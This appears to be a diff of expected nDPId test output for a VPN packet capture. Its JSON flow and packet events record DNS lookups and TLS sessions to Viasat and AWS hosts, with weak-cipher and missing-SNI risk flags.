-00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. 
- for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": 
{"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. 
- for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
-01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01484{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 